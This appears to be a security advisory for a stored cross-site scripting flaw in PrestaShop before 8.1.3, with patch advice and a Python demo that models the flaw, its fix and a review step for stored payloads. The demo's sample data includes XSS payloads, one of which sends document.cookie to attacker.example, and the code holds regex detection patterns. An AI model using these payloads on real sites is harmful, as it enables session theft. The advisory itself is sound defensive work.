PT-2024-18979 · Unknown · Prestashop

Rona Febriana

·

Published

2024-01-02

·

Updated

2024-03-06

·

CVE-2024-21628

CVSS v3.1

5.4

Medium

Vector AV:N/AC:L/PR:L/UI:R/S:C/C:L/I:N/A:L
Name of the Vulnerable Software and Affected Versions PrestaShop versions prior to 8.1.3
Description PrestaShop is an open-source e-commerce platform. In versions prior to 8.1.3, the isCleanHtml method is not applied to the input of one form, so a cross-site scripting payload submitted through it is written to the database unchanged. The impact is low in the back office (BO): the stored value is rendered through Twig, whose auto-escaping prevents the HTML from being interpreted. In the front office (FO) the payload can execute, but only for the customer who submitted it or within the customer session from which it was sent. The real exposure is for shops running a module that fetches these stored messages from the database and outputs them without HTML escaping, because that module renders the payload as live markup.
Recommendations Update to PrestaShop 8.1.3 or later, which contains a patch for this issue. Until the update can be applied, disable or restrict access to any module that fetches these messages from the database and displays them without HTML escaping, and do not use such a module in the front office until it escapes its output. Note that the patch validates new input only: any payload stored before the update remains in the database, so after patching review existing messages for script tags, event-handler attributes and javascript: URIs before allowing any module to display them.
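The mechanism above (input stored without an isCleanHtml-style check, then neutralised by auto-escaping in one place and executed by a raw-output module in another) is shown end to end below. This is an added example written for this page, not PrestaShop's code: the `is_clean_html` function is an approximation of the kind of check an HTML validator performs and is not PrestaShop's implementation, the two `store_message_*` functions model the unpatched and patched form handlers, the two `render_*` functions model Twig auto-escaping versus a module that echoes the stored value, and the sample messages are constructed. `find_stored_payloads` is the post-patch review step from the recommendations.

```python
import html
import re

# Constructed sample input: what customers might submit through the form.
# The last three are XSS payloads; the first two are legitimate messages.
SAMPLE_MESSAGES = [
    "Hello, where is my order #1234?",
    "<b>urgent</b> please reply",
    "<script>document.location='https://attacker.example/?c='+document.cookie</script>",
    '<img src=x onerror="alert(1)">',
    '<a href="javascript:alert(1)">click</a>',
]

# Assumption: an isCleanHtml-style validator rejects script elements, inline
# event handlers and javascript: URIs. This is an approximation for the
# example, not PrestaShop's Tools::isCleanHtml.
_SCRIPT = re.compile(r"<\s*script", re.IGNORECASE)
_EVENT_HANDLER = re.compile(r"<[^>]*\son[a-z]+\s*=", re.IGNORECASE)
_JS_URI = re.compile(r"(href|src)\s*=\s*['\"]?\s*javascript:", re.IGNORECASE)


def is_clean_html(text: str) -> bool:
    """Return True when the text carries none of the patterns above."""
    return not (_SCRIPT.search(text) or _EVENT_HANDLER.search(text) or _JS_URI.search(text))


def store_message_unvalidated(db: list, text: str) -> bool:
    """Models the pre-8.1.3 handler: the form value is saved as submitted."""
    db.append(text)
    return True


def store_message_validated(db: list, text: str) -> bool:
    """Models the patched handler: reject input that fails the HTML check."""
    if not is_clean_html(text):
        return False
    db.append(text)
    return True


def render_escaped(text: str) -> str:
    """Models Twig auto-escaping in the back office: markup becomes inert text."""
    return html.escape(text, quote=True)


def render_raw(text: str) -> str:
    """Models a module that prints the stored value without escaping (the FO risk)."""
    return text


def find_stored_payloads(db: list) -> list:
    """Post-patch review: flag rows that would not have passed the validator."""
    return [m for m in db if not is_clean_html(m)]


if __name__ == "__main__":
    unpatched, patched = [], []
    for m in SAMPLE_MESSAGES:
        store_message_unvalidated(unpatched, m)
        store_message_validated(patched, m)
    print("stored by unpatched form:", len(unpatched))
    print("stored by patched form:  ", len(patched))
    print("rows needing review:     ", find_stored_payloads(unpatched))
    print("BO render of payload:    ", render_escaped(unpatched[2]))
    print("raw module render:       ", render_raw(unpatched[2]))
```

Run stand-alone, the script shows the unpatched handler keeping all five rows while the patched handler keeps two; the escaped render of the script payload contains no `<script` and is safe to display, whereas `render_raw` returns the payload verbatim, which is exactly what a module that skips escaping would emit into the front office.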

XSS

Weakness Enumeration

Related Identifiers

BIT-PRESTASHOP-2024-21628
CVE-2024-21628
GHSA-VR7M-R9VM-M4WF

Affected Products

PrestaShop